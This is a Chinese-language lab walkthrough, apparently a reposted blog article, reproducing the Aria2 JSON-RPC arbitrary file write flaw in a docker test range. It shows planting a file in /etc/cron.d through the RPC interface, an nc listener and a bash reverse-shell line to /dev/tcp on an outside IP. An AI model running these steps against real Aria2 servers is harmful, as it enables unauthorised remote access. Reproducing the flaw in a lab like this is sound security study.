Aria2 任意文件写入漏洞

Aria2 任意文件写入漏洞,第1张

Aria2 任意文件写入漏洞 1、漏洞概述

Aria2是一个轻量级,多协议,多源下载工具(支持HTTP / HTTPS,FTP,BitTorrent,metalink),内置XML-RPC和JSON-RPC接口。我们可以使用RPC接口来 *** 作aria2并将文件下载到任何目录,从而导致任意文件写入漏洞。

参考文章:

https://paper.seebug.org/120/

2、漏洞复现

(1)打开靶场环境

docker-compose up -d

 

(2)因为 rpc 通信需要 json 或 xml,所以不方便,所以我们可以使用第三方 UI 与目标进行通信,比如:

http://binux.github.io/yaaw/demo/

 (3)点击标红位置,进行配置

http://靶机IP地址:6800/jsonrpc

 (4)进行设置下载连接,填写URL,以及设置靶机的路径

http://攻击机IP地址

 显示下载成功

 (5)确定添加后,可以到容器下查看,文件成功下载到指定目录

docker exec -it ac44a6306573 bash

cd /etc/cron.d

ls

cat shell1

 (6)在被反dshell的攻击机下监听端口

nc -lvp port

bash -i >& /dev/tcp/10.222.23.99/9999 0>&1

反dshell成功!

(7) 关闭靶场环境

docker-compose down

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zaji/5707472.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存